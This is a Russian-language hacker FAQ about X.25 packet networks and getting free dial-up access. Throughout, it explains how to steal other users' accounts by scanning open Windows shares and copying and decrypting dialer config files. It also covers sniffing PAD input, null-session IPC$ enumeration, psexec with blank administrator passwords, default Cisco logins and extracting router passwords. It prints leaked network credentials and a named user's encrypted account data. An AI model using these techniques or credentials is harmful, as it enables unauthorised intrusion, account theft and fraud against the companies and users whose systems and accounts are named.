RSS

Компьютерная терминология    1_9  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  .....  A  Б  В  Г  Д  Ж  З  И  К  Л  М  Н  О  П  Р  С  Т  У  Ф  Х  Ц  Ч

X25 сети

  1. Введение в Интернет и безопасность в нем
    1.1. Интернет
    1.2 Обзор внутреннего устройства TCP/IP
    1.3 Проблемы, связанные с безопасностью
    1.4 Насколько уязвимы сети организаци в Интернете?
  2. Введение в брандмауэры
    2.1 Понятие брандмауэра
    2.2 Почему именно брандмауэры?
    2.3 Проблемы, возникающие из-за брандмауэров
    2.4 Компоненты брандмауэра
  3. Объединение частей в единое целое - примеры брандмауэров
    3.1 Брандмауэр с фильтрацией пакетов
    3.2 Брандмауэр на основе машины, подключенной к двум сетям
    3.3 Брандмауэр с изолированным хостом
    3.4 Брандмауэр с изолированной подсетью
    3.5 Интеграция модемных пулов с брандмауэрами
  4. Следующие шаги
    4.1 Политика брандмауэра
    4.2 Приобретение брандмауэра
    4.3 Организационные вопросы с брандмауэрами
  5. Приложение. Онлайновые информационные ресурсы
 Бесплатная консультация специалиста
Loading…
 
PAD - то, на что вы звоните
NUI - network user identificator, то есть по-инетовски логин - штука, определяющая кто будет платить за соединение.
NUA - адрес в x.25 сети
Q: Слышал, что есть такие x.25 сети. Что это такое и зачем они нужны?

A: X.25 - это протокол, который применяется в так называемых сетях пакетной коммутации. Базируются такие сети на PAD’ах - Packet Assembler Disassembler. Таких PAD'ов много, и они разбросаны по всему миру. При подключении между падами устанавливается виртуальное соединение, по нему и происходит передача данных. X.25 сети интересны тем, что в них имеют выход многие крупные корпоративные сети. Здесь можно встретить локальные сети банков, аэропортов.


3.Как мне попасть из Ситы в Спринт? (и вообще из одной x.25 сети в другую)
В общем случае - только используя полную адресацию (то есть с DNIC-ом). Но я почти на 100% уверен что у вас этого не получится так как для этого надо иметь свой NUI, которому разрешен такой доступ (то есть всякие общедоступные или вообще их отсутствие тут не катит). Также можно через диалаут, имея при этом
страшный гемор и убогую скорость. А о существовании мифических "адресов гейтов" из одной сети в другую я никогда не слышал, так что будем считать что их нет (а если и есть никто вам про них не скажет)
Сейчас вроде как люди не знают даже что такое адресация "с dnic'ом", для них вставим кусок старой доки:
формат адреса:
0 XXXX YYYY YYYY YY
0 - означает то что адрес задан в полной адресации
XXXX - DNIC, то есть код сети где первая цифра - код региона, вторая и третья - код страны, последняя - код сети в стране. Для России первые три цифры - 250,
последняя же:
0 - ROSPAC
1 - SPRINT
2 - IASNET
3 - MMTLnet
4 - INFOTEL
6 - ROSNET
7 - ISTOK-K
8 - TRANSINFORM
YYYY YYYY YY - внутрисетевой адрес а еще для тех, кто не знает: сканирование x.25 сети - это последовательный перебор адресов, то есть nua. Его можно осуществить программами типа sprinter или ultra hack, ссылки кидать не буду - ищите ultra.zip или sprinter.zip note1. dnic ситы вроде бы 1116, во всяком случае таким его показывает умная железка фирмы cisco note2. подозреваю я что uunet есть тоже x.25 сеть с dnic 3132
4. А как мне достать NUI?
Общедоступную NUI можно выковорить из всяких там программ доступа к сетям через x.25, например WinCIM, посмотрев на их скрипты или на то, что они передают в порт. Нормальные же NUI можно достать или их покупкой, или как-нибудь спереть их у юзера, например сниффингом сети
5. А что такое сниффинг x.25 сети?
Это перехват ввода другого пользователя. PAD'ы как и другие узлы, имеют свои адреса а значит к ним можно попробовать подключиться. Это возможно не во всех сетях, а там где возможно - поиск таких адресов везде различен. Давным-давно сниффинг в сите описал cyberlirik, а недавно в x25zine#2 graf описывает сниффинг в роснете. советую прочитать.
 6a. А иногда программу доступа не дают просто так скачать
В таких случаях можно попробовать скачать программу с расшаренного диска юзера этой сети и у себя доводить ее до функциональности, запустив к примеру filemon и regmon и смотреть куда они обращаются в реестре/чего им не хватает из файлов. Я так доводил до функциональности несколько диалеров, заодно узнал в какой ветви реестра они хронят настройки...
7. Есть ли гейт inet->[любая x.25 сеть]?
В любую x.25 сеть из инета можно попасть через диалаут, которые иногда встречаются на просторах сети
без диалаута можно попасть например сюда:
telnet 194.186.138.131 (rol)
telnet uu.x25.net.ru (uunet)
telnet x25pad.autonet.net (autonet)
telnet lon.telnet.ja.net (janet)
telnet 192.156.137.139 2600 (вроде SITA)
telnet 194.67.8.161 8099 (SOVAMNET)
примечание. с момента прошлого выпуска прошло много времени а информацию эту я снова не проверял. Может быть эти гейты уже не пашут.
Часть 2. Некоторые x.25 сети поконкретнее...
a) UUNET
8. Есть ли в России прямые пулы uunet и их ppp-пулы?
Нету.
Аналогом "ppp-пула" uunet (точнее worldcom'а) можно считать хост wcdial с паролем
sr1p.hpf
или РОЛ со следующим скриптом:
proc main
waitfor "ogin:"
transmit "dial@uupops.net^M"
waitfor "word:"
transmit "dial@uupops.net^M"
endproc
только один хрен, почти все забанено 8a/ а как тогда туда попасть через х.25?
Это все написано на хосте uunet'a mwan. Но там описано не всё, да и зачем много раз составлять одни и те же сценарии если они составлены уже не раз?
Итак:
через ROL, заюзав логин и пароль dial@uupops.net
через ситу nua 2111855
через спринт nua 202202
через tymnet с мневмоникой CML05 (однако у нас это рубанули давно уже)
через ppp infonet с логином dial@uupops.net (информация тут противоречива - с одной стороны сделав на циске sh us можно видеть людей сидящих таким образом а с другой - войти не получается)
через x.25 infonet ( waitfor "CENTER:" transmit "EURO" )
через sovamnet с nua 93106001133
через ppp equant все с тем же dial@uupops.net и еще х. знает через что
И вообще, скрипты доступа почти через все сети мира =) есть в ихней звонилке, скачайте и смотрите.
 9. Как достать uic и password?
Аккаунты ко всему достаются путем сканирования на открытые шары, и uunet тут не исключение. Другое дело, что подобные аккаунты хрянятся не где обычно (PWL), а в конфигурационных файлах программы доступа к конкретной сети. Для этого необходимо скачать соответствующую программу доступа, изучить где она хранит данные о пользователе, и тянуть с шар этот файл, потом у себя скормить спертый файл программе доступа если кто-нибудь еще не подсуетился и не написал расшифровщик, и выбить из неё необходимые данные (с помощью например все того же openpass'a)
Программа доступа для uunet называется phone access lookupИмеется и расшифровщик конфигов, написанный barvinok. Конфиг ее лежит в \progra~1\pal\pal.ini (или \progra~1\pal95\pal95.ini или... возможны варианты) после расшифровки получаем:
Info #0 : HostName=hpco
Info #1 : UserID=m00108415
Info #2 : Password=28Faz6m7
тогда как следующее - для ppp:
Info #0 : host_user=m00108415@hp.com
Info #1 : host_pw=28Faz6m7
Многие вот жалуются, что мол нету нигде этих pal.ini.
Hint: на всем известных диапазонах (212.211. и т.д.) на win95-машинах эти файлы мне почему-то попадались крайне редко. Основную массу я тягал с nt, так что думайте, как сканить... как примерно можно это сделать будет описано ниже, в разделе "разное" =) ссылочки: расшифровщик openpass
Многие могут сказать - да что мол, зачем сейчас эти уики все равно везде забанено всё. скажем так - во первых через жопу (второе ppp скажем) можно юзать и сейчас, во вторых они почему-то изредка разбаниваются ;) а в третьих ну вот говорят что agilent на РОЛе идет и по сей день...
10. Как мне использовать закрытые для России аккаунты worldcom?
Cуществует много вариаций, например:
1)exec shell циски на каком-нибудь из хостов к которым доступ разрешен.
Попав туда набираем: pad 2111855, или pad 3132 (или pad 31329 - точно не помню).
А может, циска уже имеет доступ в инет и можно подсоединиться к telnet гейту набрав скажем telnet uu.x25.net.ru. В некоторых случаях вам может понадобится установить второе ppp соединение, о чем уже до фига писалось.
2)попробовать через грик (некоторые домены имеют роуминг по умолчанию.
например таким был @hp.com (hostname hpco), но из-за наплыва халявщиков недавно был закрыт. Однако таких доменов еще немеряно)
updated. доюзались через грик - закрыли почти всё нахрен. уунет через рол теперь почти не юзается.
3)выходя в уунет через какие-нибудь левые сети (но тут как я писал раньше нужен NUI)
11. А как лучше сканить UUNET?
Сканировать с терминала - это вчерашний день. Добудьте где-нибудь шелл и сканируйте с него через ip гейт. Кроме того, необходимо достать программу-сканер. Perl и всякие там expect'ы - довольно тормозная вещь, поэтому опитмальный вариант - это реализация многопоточности на си (например uunetscan.narod.ru) или то же самое через nonblocking sockets (хрен знает есть ли такое)
12. Дайте мне диапазоны где сидят диалапщики hp.com, kpmg.com и т.д
Нет у них своих диапазонов, потому что это - не провайдеры, а компании занимающиеся более другими делами, а в инете их работники или кто они там, эти люди с аккаунтами, сидят через worldcom, так что и искать их надо там.
13. А я слышал, что можно коннектиться к compuserve через Петерлинк
У них на сайте лежат скрипты для WinCIM'а но я их не изучал и не собираюсь потому что думаю что ничего хорошего из этого не выйдет.
14. Как менять пароли на аккаунты worldcom'а?
Честно говоря, я уже не помню. У меня где-то было это записано . Если мне не изменяет память это было и еще что-то для другого типа акков. В любом случае куда копать я вам сказал. Кстати если пошустрить в диапазоне веб-серваков wcom.net сканером можно найти много интересного, например
vpnclients.wcom.net с софтом для доступа в VPN соответствующих компаний со всеми вытека-ющими последствиями. Вот кстати и второе правило исследования разных сетей - пробовать найти и заюзать все пользовательские сервисы, логиниться куда угодно, прошерстить все http а особенно https сервера...
б) Сита.
Кратенько - как начать работать с падом:
после дозвона необходимо задать тип терминала - передать .^M где ^M = enter. Вылезет

SITA network : xxxx xxx где xxxx xxx - адрес линии на которую дозвонились.

После этого надо задать NUI (без него не дадую никуда вылезти): nui xxxxxxxx
и после запроса ввести пароль. после этого вводим NUA и вперед.


15. Какие есть общедоступные Nui для ситы?
19730001/KHS9NE
16. Вот сижу я на сите и вдруг пакеты перестают ходить, а связь не рвется.
Происходит это оттого, что сеть слишком загружена. Несколько лет назад этого не было никогда, но и любителей халявы тогда было уж куда поменьше. По-моему единого решения этой проблемы не существует, но вот суждения высказанные разными людьми в разное время:
a) это зависит от используемого nui и nua (вполне возможно, ищите те которые никто не использует) а также от логина (а это уже бред)
б) от скорости соединения - чем ниже тем стабильнее. (не уверен, это помогает когда плохая линия связи а тут вряд ли поможет)
в) надо изменить размер входных и выходных пакетов. (вот это наиболее полезная по моему штука, для этого надо перед nua ставить конструкцию задающую их размер:
Line(xxx/xxx) yournua, например
Line(64/64) 9002167001
г) изменить параметры пада (даже кто-то приводил необходимые значения:
set 1:0,2:0,3:0,4:1,9:0,13:4,21:0 но это особо не помогает)
д) запустить Сеанс MS-DOS и там набрать:
ping -t uunet.x25.net.ru (этот хост для примера, можно использовать любой
другой). Смысл в том, чтобы пакеты шли постоянно. Тем самым вы резервируйте для себя чуть-чуть канала. Конечно, что-либо качать это мешает, но сидеть в IRC/ICQ - самое то.
Вобщем попробуйте эти способы и может вам это поможет.
17. Как по ситовскому nua определить местоположение?
формат адреса:
2 XX X YYY
XXX - код страны, например 270 - Россия.
18. Что можно использовать через ситу?
В сите есть адреса почти всех известных провайдеров которые все очень любят =)
Ну про адрес uunetа уже писали, ipass и equant - смотри ниже, грик-тоже ниже =)
в) Спринт.
как начать работать с падом: звоним на пул, далее необходимо задать количество битов/четность. Для 8N1 вводим @D^M получим запрос terminal= на который введем d1^M и ждем приглашение @D. Cюда вводим команды, или NUA. В данной сети как и во многих других к некоторым адресам можно подключаться без NUI, а при соединении с NUI формат команды будет nua,nui,nua_password
19. Что можно заюзать?
в спринте есть Nua через которые можно было использовать некоторые аккаунты equantа
(например icw5@gn.microsoft.com =)) и соответственно ipass через эквант (это сейчас
уже вряд ли). NUA:
031109671905100
76632343
031105721029100
031109601178000
031109671905100
кроме того конечно там есть nua gin'a, см. раздел про gin.
г) Роснет.
сразу после дозвона вылезет Welcome to ROSNET! и приглашение * -туда и вводим свой NUA. Через Роснет доступны только русские ресурсы поэтому там можно заюзать только ихние собственные логины (см. www.rosnet.ru) и MTU (см. ниже)
д) Cовамнет.
Что-то нонче интерес к совамнету поутих, раньше каждый день кто-то спрашивал про nui =)
Совамнет - это сеть компании СовамТелепорт, использующая технологию x.25
Используется например для связи между всякими там банками Построено все это чудо на оборудовании Nortel Magellan Доступ к ней можно осуществить через пул РОЛ, позвонив туда или прителнетившись,
и использовав логин и пароль x25:
sovam!login: x25
Password:
Trying 194.67.8.161, 8099 ... Open
SOVAMNET: 30130123
Далее вводим NUI (так просто вам его не даст, так что ищите сами). Формат команды как в сите (nui xxxxxxxx).
SOVAMNET: network user identifier xxxxxxxx active
Далее, вводим nua.
е) Тимнет.
честно говоря, не знаю что про эту сеть и сказать-то =) я через нее только уунетовские хосты использовал давным-давно. Скажу только что звонить надо с настройками 7e1 и в log in: писать мневмонику
Часть 3. Провайдеры, буржуйские и наши.
a) грик консорцыум
20. Какие домены грика до сих пор работают? как мне включить роуминг на [domain]?
Работающих (не закрытых для России) доменов осталось очень мало, поэтому ясное дело никто не хочет их светить. попробуйте поискать сами список всех провайдеров входящих в консорциум Точно также и с включением роуминга - просто там никто не скажет, ищите на сайте провадера сами. Сейчас с включением роуминга на Россию стало вообще тяжело - по умолчанию его уже не делает вроде никто, и сделать его можно через жопу - куда-нибудь позвонив, прислав им скан документа и т.д. Так что наверное можете уже и не искать. =) Грик как он был раньше уже не
работоспособен для нас можно сказать, через него можно использовать сейчас некие остатки уунета, фиберлинк и т.д.
21. Можно ли использовать аккаунты грика через x.25 сети?
Скрипт, лежавший одновременно и в гриковом, и в фиберлинковском диалере:
proc main
transmit "...^M"
waitfor "SITA NETWORK"
transmit "NUI xxxxxxxxx^M"
waitfor "password"
transmit "xxxxxx^M"
waitfor "active"
transmit "2124172001^M"
waitfor "connected"
endproc
б) equant
Забанено так же очнь много. До сих пор работают аккаунты нескольких компаний, а халявщики же основной упор делают на использование *.00.go - по моему разумению что-то вроде аналога корпоративных аккаунтов в ворлдкоме.
22. Как использовать аккаунты equant забаненые на прямых пулах?
Выбирайте nui из вышеприведенного списка ситовских, а нуа вот отсюда:
9002156001 2311021001 - ams
9002157001 2337528001 - par
9002158001 2498247001 - fra
9002159001 2126209001 - lax
9002160001 2151271001 - sea
9002161001 2112184001 - jre
9002167001 2811222001 - qxo
9002168001 2853167001 - hkg
9002169001 2616373001 - bwu
9002261001 2448678001 - lon
9003156001 2151271001 - ams
9003157001 2337528001 - par
9003158001 2498247001 - fra
9003159001 2126209001 - lax
9003160001 2151271001 - sea
9003161001 2112184001 - jre
9003167001 2811222001 - qxo
9003168001 2853167001 - hkg
9003169001 2616372001 - bwu
9003261001 2448672001 - lon
на сегодняшний день точно работают с этими nua nui 79900001 и 22421028
в) at&t, ibmnet
по этим вещам у меня информации не очень много, и уверенности в том что она правильная нету, но напишем что знаем.
23. Как использовать аккаунты AT&T?
23a) worldnet
обычные аккаунты типа 518151427@worldnet.att.net сейчас уже вроде как использовать не получится.
Раньше работало следующее:
Через пул:
proc main
transmit "*CLR
" waitfor "Please Sign-on:"
transmit "123456890@worldnet.ics-cug.att.net^M"
waitfor "Password:"
transmit "569365964^M" - может быть любым.
waitfor "Please Sign-on:"
transmit "ваш аккаунт AT&T,ваш пароль AT&T"
waitfor "}"
endproc

Через INFONET:
proc main
waitfor "ogin:
" transmit "wvpn03*xwnet04^M"
waitfor "assword:"
transmit "wvpn03oz^M"
waitfor "connected"
transmit "^M"
endproc
скрипт через пул at&t очень похож на те которые сейчас используются на аккаунтах типа userxxxx@xxx.domain.service.att.net, про которые вы можете прочитать в статье vaio, взятой с deer.net.ru здесь ATT а логин/пасс для доступа к ppp через инфонет вроде тоже работает(или работал?) после бана
xxxxxxxx@worldnet.att.net так что пусть эта инфа останется, решил я. Про акки userxxxx@xxx.domain.service.att.net я уже говорил где читать надо =)
23б) global network
аккаунты типа dualaccess.*.* , secureip.*.* да и вообще все кроме internet.*.* по умолчанию работают на наших пулах. а на аккаунтах internet.*.* по умолчанию нету роуминга только на 3 страны - Филиппины, Пакистан и конечно же Россия. По информации на сайте чтобы врубить роуминг надо позвонить в службу поддержки для
России, дается телефон в Голландии. Кто хочет звоните =) Кроме того, аккаунты с включенным роумингом можно найти на диапазонах где сидят российские юзеры =) p.s. когда копался в свойствах аккаунта на services.prserv.net там было manage your credit card, user information и т.д. я там особо не лазил, но возможно
там есть информация о кредитке владельца аккаунта - кардерам на заметку =)
г) GIN
на своем веб-сайте называют себя "русский эквант". И действительно что-то общее заметить легко ;) Имеют ppp-пулы а также доступны через Спринт со следующим скриптом лежащем на их сайте:
proc main
string szPassword
transmit "@D^M"
waitfor "TERMINAL=",matchcase until 7
transmit "^M"
waitfor "@",matchcase until 1
transmit "025017720101800^M"
endproc
Через gin работают аккаунты экванта типа *.00.* ,более того мне нередко встречались 00.ru которые являются русскими корпоративными аккаунтами. Обычные же юзеры имеют аккаунты типа @gin.ru @gin.by и типа того...
p.s. интересно если аккаунты екванта работают через джин то верно ли обратное? =) не пробовал никогда
д)ipass
честно говоря, рабочего аккаунта ipass который можно бы было использовать в России я уже не видел давно, но я в общем-то и не искал =) Раньше работало следующее:
-через equant,gric и еще х знает через что добавляя перед логином "IPASS/". например:
IPASS/000066638963044478010#0014@t-online.de
-через ситу: nui 37830001 nua 9001252001 - это "родная" информация, тут возможны варианты.
а вот какие скрипты лежат в официальном хелпе ipass'а только я думаю у нас таких сетей не водится: IPASS
у них есть свой диалер, которым юзеры на роуминге любят пользоваться, называется
ipassconect, аккаунт лежит в \progra~1\ipass\ipassco~1\userpref.ini, для извлекания пароля - тянем ipassconnect и юзаем openpass
е) инфонет
Имеется ppp-пул доступный для всей России 8w8002001234 (про toll free смотри ниже)
Инет довольно хороший и бодренький, однако тут тоже сказалась эпидемия отхватывания банов - на многие хорошие домены все чаще видишь NAS group unlisted =(
Аккаунты есть двух типов: user*обозначение_домена и user@domain Разницы между ними по моему особой нету, как написано в хелпе к диалеру первое - просто более старая форма записи, а вторая - более новая.
У них свой диалер dialxpressway, с которым лично я до конца не разобрался.
Аккауни лежит \progra~\infone~\dialxpressway <версия диалера>\data\accounts.username.ini или accesscodes.username.ini
Однако после скачивания файла возможны варианты:
[david.griggs@reckittbenckiser.com]
P=8C001002010200000168000000A4000084C19015DC76D48CCA1F02BC25479F6D009A928149E2D3B48
7D11B12AE37A15A920C140AD2C459144FD4D7502C26D385A868CF3DA2B6452AD9D3401F01F4F4E00FD7
2FE0EF9F8D79747CE75A93161A0B687DE720D7EF4D598B98950C400F794634A7A94C1E5BDAB345E3DF6
BC1B4444555BF47F4E52A5E51D9885A289AED020007000000557F5072AAFB81
F=000000
R=rb
Пароль как я думаю вы уже догадались зашифрован в строчке P= так вот. Если первый байт =8 то при подкладывании конфига в свой диалер пароль появится в виде звездочек в нужном поле и остается только запустить openpass а если 4= то х...й - пароль не появится. На взгляд шифрованный пароль в таком виде короче:
[rstevens*cayto0m]
P=4C002002010200000168000000A40000539A4F5DD4008837248452194DCDD948DF73247E0B07CE46B
88434CC95AFFAE9F63B48607541E8E79A8D4AC3C234D8FAAB55EF960F25703C3FE3AA33FB1C02000800
000044837C6939F45E9B
F=000000
R=Standard
и я сделал вывод что ключ к расшифровке в этом случае хранится в реестре, и не находя его система не может расшифровать конфиг. поэтому надо еще и с реестром заморачиваться.
ё)МТУ
Московский провайдер МТУ-интел. Почему он столь любим нашими халявщиками - я не знаю но его любят поюзать все.
24. Можно ли использовать аккаунты МТУ не в Москве?
В Роснете есть (был?) ppp вход в МТУ Посмотрите nua 600814055 600290504 или поищите по старым публикациям про роснет. updated: появился и пул в Питере - 3801108
А еще есть один Роснетовский nua который правда работает вроде только для подмосковья 61106500004
Часть 4. Разное
25. А правда, что телефоны 8-800 бесплатные?
Правда. В этом можно убедиться даже смотря телевизор ("горячая линия против простуды" и прочая херь). Типа, шагаем в ногу с америкой (там 1-800 тоже free) Правда тут есть минус - если твой номер невозможно определить АТС тебя не пустит на междугороднюю линию и поэтому твой номер при таких звонках всегда определён. Поэтому счет не придет но могут придти серые люди.
26. Как установить второе ppp соединение под *nix?
нужно воспользоваться программой которая может перенаправлять свой ввод и вывод на виртуальный терминал (pty) и настроить pppd на работу с этим самым pty. Пример таких программ - modemu (читаем ее документацию), pty-redir (читаем VPN-howto или mini-howto, не помню уже. там все показано
на примере, правда не pppd а ssh)
27. Есть у меня диалер для сети xxx. Как посмотреть какими командами он обменивается с пулом/выдрать скрипт/etc
Тут вариантов много. Например чтобы друг с терминалкой эмулировал пул и позвонить ему =) однако можно это все сделить просто и на одной машине используя драйвер виртуального модема, например COM/IP. Итак:
1) Ставим COM/IP с драйвером виртуального ком-порта и модема. Итак можно вместо звонков конектиться по ТСР
2). Запускаем что-нибудь на проспушивание какого-либо порта (в COM/IP по умолчанию
23), так, чтобы можно было руками вводить как бы "ответы" padа - например вполне сойдет nc
3)в звонилке ставим юзать com/ip virtual modem звоним на номер 127000000001 то есть подрубаемся к nc и осуществляем обмен данными =)
28. Как узнать ip-диапазоны dialup'а буржуйского провайдера [kewlprovider]?
Я делал очень просто - заходил на irc в очень многопосещаемый канал (типа #usa, или #japan когда речь шла о каком нибудь ocn.ne.jp =)) и просто там висел. Потом просматривая логи joins/parts, можно было видеть что нибудь типа:
* ivangovnov (govnov@line111.dial.kewlprovider.com) has joined #usa то что нам и надо.
Правда оказывается даже после этого люди не могут найти эту галку =)
А я уже и вспомнить не могу, где ее когда-то ставил. По моему это в категории IRC не выбирая подкатегорию ставим show addresses и убираем short joins/parts

И еще. Люди спрашивают "как же мол whois". Так вот, с whoisа вы получите либо огромный диапазон который зае...тесь просканивать или там вообще не окажется ни одного диалапщика а только вебсервера какие-нибудь


29. Как узнать адреса DNS серверов для провайдера [kewlprovider]?
Как правило если при установлении ppp соединения удаленная сторона не сообщает вас адреса dns, то в принципе в свойстве соединения можно прописать адреса любых dns серверов. Если все-таки нужны адреса обслуживающие конкретный домен, то:
запускаем nslookup
говорим ей set type=ns
и после этого вводим домен для которого надо узнать адреса, например rosnet.ru
30. Вот сканерю я, а какие файлы обычно люди с шар тянут?
аськины uinы:
\progra~1\icq\2000a\??????.uin
\progra~1\icq\2000b\??????.uin и так далее
конфиги диалеров, например \windows\edialer.ini
\progra~1\ipass\ipassco~1\userpref.ini - ipass
\progra~1\ipass\ipassco~1\ipass.ini - ipass
\progra~1\at&t\wns\user\account.* - at&t dialer, как его там
конфиги ftp клиентов, типа \progra~1\ws_ftp\ws_ftp.ini - там часто можно
обнаружить аккаунт на шелл
ну и про *.pwl и system.ini и так все знают
31. как найти dialout?
Вкратце - открытые модемы в основном висят на портах 2001-2012. сканим и ищем =) а еще бывает на 4001-4012 или 6001-6012,
32. Какие есть пароли по умолчанию на всякие там роутеры?
вот некоторые из них (собранные вроде cyberliric'ом):
passw
а вообще надо просто почитать официальную документацию на интересующую железку, из нее и пароли узнаете и еще много интересного =)
33. А как находить расшаренные диски? у меня сканер ничего не находит
Это наверное вопрос номер 1 на всех форумах =) хоть он тут и не очень в тему ответим.
Чтобы правильно работал сканер надобно:
чтобы в свойствах соединения с инетом стояла галка "вход в сеть" и были установлены следующие компоненты:
протокол tcp/ip и "контроллер удаленного доступа" (естественно)
клиент для сетей microsoft
и (вроде бы) протокол NetBEUI хотя по-моему он как раз таки и не нужен
34. А некоторые диалеры типа GRICdial хранят всю информацию в реестре. Что делать?
Подмонтировать диск и заюзать Registry Viewer - тогда можно будет обойтись без скачиавния всего реестра. Хотя я все-таки рекомендую посмотреть на размер реестра - если он не очень-то большой то лучше наверное все-таки его скачать
35. Теперь ветка win9x закрыта, выпускают только клоны NT. Как же сканировать?
Все распространенные сканеры не могут работать с WinNT машинами потому что там немного другая система доступа к расшаренному диску - допускать вас или нет определяется паролем на диск, а аккаунтом. Таким образом надо получить аккаунт на данной машине и потом уже пытаться получить доступ к диску.
Вкратце расскажу как сделать это руками:
-сначала надо определить имя пользователя. это можно сделать с помощью sid2user и user2sid. не знаю работает ли это на всяких там XP - я пишу про классическую NT4 с которой раньше часто имел дело =)
Не забывайте о стандартных аккаунтах. Юзера administrator не все переименовывают -посмотреть какие шары доступны.
net use \\ip\IPC$ "" /user:"" (или например уже тут использовать известный
аккаунт если он есть: net use \\ip\IPC$ "" /user:administrator) и сделать net view \\ip
минусы - не будут выведены шары у которых в имени на конце $
Не забывайте о стандартных NT шарах C$ D$ ADMIN$ =) -ну и собственно подключить диск (net use q: \\ip\C$ "password" /user:"login") и скачивать информацию.
примечание. sam и реестр так скачать не получится. придется ограничиться конфигами диалеров. Как теоретически выбить информацию из sam смотри в след. вопросе
36. Как поставить пандору на шелл?
Есть пандора под Linux. однако все почему-то предпочитают ставить её на NT. Следовательно надо получить привелегию исполнять команды на сервере. Кому-то тут может помочь старый добрый тупой уникодовский баг но я пользовался следующим - я уже писал что многие не отключают юзера administrator и пароль у
этого юзера пустой. Если зайти на www.sysinternals.com то можно найти такую штуку как psexec которая установится на том компе как сервис и позволит выполнить там любую команду. Поэтому пускаем
psexec \\ip -u administrator -p "" cmd и радуемся.
37. Нашел классного провайдера xxx аккаунты которого можно использовать через сервис yyy и где включать роуминг но его не дают включить =(
Нередко такие вещи как управление аккаунтом дают делать только со своих диапазонов. Поэтому надо найти телефон пула провайдера xxx, установить второе ppp соединение через dialout и врубить себе роуминг.
38. Как взломать cisco и взять у нее пароли от интернета?

Невозможно вот так взять и научить взломать cisco особенно если админ не дурак. Попробуйте найти аккаунт к ней, можно тупо попробовать cisco/cisco, если циска прова - заюзать его аккаунт, а авось бросят не в РРР сразу а в exec shell =) Далее надо получить необходимые привелегии чтобы посмотреть конфигурацию системы то есть войти в enable - 15ый уровень привелегий. Делают
это командой enable которая скорее всего вас обломает запросом password: =) Но если получится и приглашение роутера сменилось с router> на router# то пишем там sh runn и получаем текущую конфигурацию роутера. Пароли там могут лежать в нескольких видах:
username user password 0 k3wlpasS незашифрованном =)
username user password 7 105A1A1C070507 зашифрованным но обратимо.
Чтобы расшифровать это дело надо john'ом the ripper'ом
Но скорее всего пароли для доступа в интернет хранятся на радиус-сервере и аутентификация производится через радиус, тогда вы увидите:
ip radius source-interface Loopback0
tacacs-server host XXX.XXX.XXX.XXX
tacacs-server host XXX.XXX.XXX.XXX
tacacs-server timeout 40
tacacs-server directed-request no-truncate
tacacs-server key some fucking key
radius-server host XXX.XXX.XXX.XXX auth-port 1645 acct-port 1646 non-standard key #
some#fucking#key
и тогда вам уже придется имеь дело с радиусом. Еще естественно надо порыться в архивах всяких bugtraq'ов перед тем как =)
p.s. если в приграшении роутера набрать ? то он выведет все свои команды если набрать ? после команды он выдаст её параметры
ПРИЛОЖЭНИЭ. Очень часто люди спрашивают - какие диапазоны ip мол мне сканить?
и раньше мы пытались ответить на это и даже приклыдавали файл в котором содержались ip которые были на 80% откровенно херовыми и ненужными. Так что насчет ip диапазонов - ищите сами, спрашивайте друг у друга и т.д. Так что - бзз приложэний.


Q.Что такое SOVAMNET, дайте мне NUI и как оттуда выйти в УУНЕТ!!!
A.Совамнет - это сеть компании СовамТелепорт, использующая технологию x.25
Используется например для связи между всякими там банками =) Построено все
это чудо на оборудовании Nortel Magellan
Доступ к ней можно осуществить через пул РОЛ, позвонив туда или прителнетившись,
и использовав логин и пароль x25:
sovam!login: x25
Password:
Trying 194.67.8.161, 8099 ... Open
SOVAMNET: 30130123
Далее вводим NUI (так просто вам его не даст, так что ищите сами). Формат
команды как в сите (nui xxxxxxxx).
SOVAMNET: network user identifier xxxxxxxx active
Далее, по просьбам трудящихся попробуем выйти в uunet:
31102020020200
SOVAMNET: call cleared - temporary network problem
SOVAMNET: 30130123
Сканить эту сеть я не пробовал так что есть ли там что интересное - хуй знает.updated: как оказалось, в uunet можно выйти по nua 93106001133, в отличие от общеизвестных записанных с dnic'ом. причём там вроде как работает много из тех хостов, которые not allowed from this gateway в других местах.


Q. Через что возможен доступ в uunet?
A.Это можно узнать на все том же хосте уунета mwan.
Но там описано не всё, и зачем много раз составлять одни и те же сценарии если они составлены уже не раз?
Итак:
через ROL:
proc main
waitfor "ogin:"
transmit "dial@uupops.net^M"
waitfor "word:"
transmit "dial@uupops.net^M"
waitfor "pen"
transmit "^M"
waitfor "ame:"
transmit $USERID, raw
transmit "^M"
waitfor "word:"
transmit $PASSWORD, raw
transmit "^M"
waitfor "~"
endproc
через sita network:
proc main
transmit "...^M"
waitfor "SITA"
transmit "nui 19730001^M"
waitfor "XXX"
transmit "khs9ne^M"
waitfor "active"
transmit "2111855^M"
waitfor "ame:"
transmit $USERID, raw
transmit "^M"
waitfor "word:"
transmit $PASSWORD, raw
transmit "^M"
waitfor "~"
endproc
через tymnet:
proc main
set port databits 7
set port parity even
transmit "^M"
waitfor "terminal"
transmit "A"
waitfor "log in"
transmit "CML05^M"
waitfor "ame:"
transmit $USERID, raw
transmit "^M"
waitfor "word:"
transmit $PASSWORD, raw
transmit "^M"
waitfor "}"
set port databits 8
set port parity none
endproc
Вставив это в свойства соединения, указываем логин и пароль в виде:
login: host_name,uic (например cnnint,kotp)
password : пароль (тут всё понятно)
для информации: в принципе пароль можно указывать и в виде
host_name,login\password . кроме того существуют и другие параметры вроде установки типа терминала
Кроме того, в уунет можно попатсть через спринт (nua 202202), раньше можно было через инфонет с логином и паролем dial@uupops.net (как сейчас - не знаю) и еще хрен знает через что
updated: например через инфонет - вот кусочек сценария:
set port databits 7
set port parity even
transmit "^M"
transmit "^M"
transmit "^M"
waitfor "#"
transmit "C"
transmit "^M"
waitfor "CENTER:"
transmit "EURO"
transmit "^M"
waitfor "Host Name:
Однако следует различать пулы инфонета - есть x.25, а есть ppp. Это скрипт для
x.25 пула, а тот общеизвестный 8w800200.... - ppp, то есть там это не прокатит.


Q.А правда, что телефоны 8-800 бесплатные?
A.Правда. В этом можно убедиться даже смотря телевизор ("горячая линия против простуды" и пр.). Типа, шагаем в ногу с америкой (там 1-800 тоже free)


Q. А как лучше сканить UUNET?
